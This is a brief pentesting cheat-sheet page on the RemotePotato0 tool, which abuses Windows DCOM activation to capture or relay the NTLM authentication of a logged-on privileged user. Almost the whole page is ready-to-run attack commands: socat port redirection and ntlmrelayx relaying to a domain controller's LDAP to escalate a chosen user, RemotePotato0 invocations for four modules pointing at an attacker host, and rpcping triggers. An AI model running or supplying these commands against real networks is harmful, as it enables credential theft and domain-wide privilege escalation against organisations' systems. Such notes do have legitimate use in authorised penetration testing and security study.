RemotePotato

Exploit

According to the RemotePotato0's README, it abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine. It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user).

We can download the executable from https://github.com/antonioCoco/RemotePotato0.

Module 0 (`-m 0`: Rpc2Http cross protocol relay server + potato trigger)

# In attack machine
sudo socat tcp-listen:135,fork,reuseaddr tcp:<target-ip>:9999 &
sudo ntlmrelayx.py -t ldap://<target-dc-ip> --no-wcf-server --escalate-user normal_user

# In target machine
# -m 0: Module (Rpc2Http cross protocol relay server + potato trigger)
# -r: Remote HTTP relay server
# -x: Rogue Oxid resolver ip
# -p: Rogue Oxid resolver port
# -s: Session id for the Cross Session Activation Attack
.\RemotePotato0.exe -m 0 -r <attack-ip> -x <attack-ip> -p 9999 -s 1

Module 1 (`-m 1`: Rpc2Http cross protocol relay server)

# -l: RPC Relay server listening port
.\RemotePotato0.exe -m 1 -l 9997 -r <attack-ip>

rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

Module 2 (`-m 2`: Rpc capture server + potato trigger)

query user
.\RemotePotato0.exe -m 2 -x <local-ip> -p 9999 -s 1

Module 3 (`-m 3`: Rpc capture server)

.\RemotePotato0.exe -m 3 -l 9997

rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

References

RemotePotato0

PreviousRegistry Keys NextWindows PrivEsc by Abusing SeBackupPrivilege

Last updated 1 month ago

hashtagExploit

hashtagModule 0 (-m 0: Rpc2Http cross protocol relay server + potato trigger)

hashtagModule 1 (-m 1: Rpc2Http cross protocol relay server)

hashtagModule 2 (-m 2: Rpc capture server + potato trigger)

hashtagModule 3 (-m 3: Rpc capture server)

hashtagReferences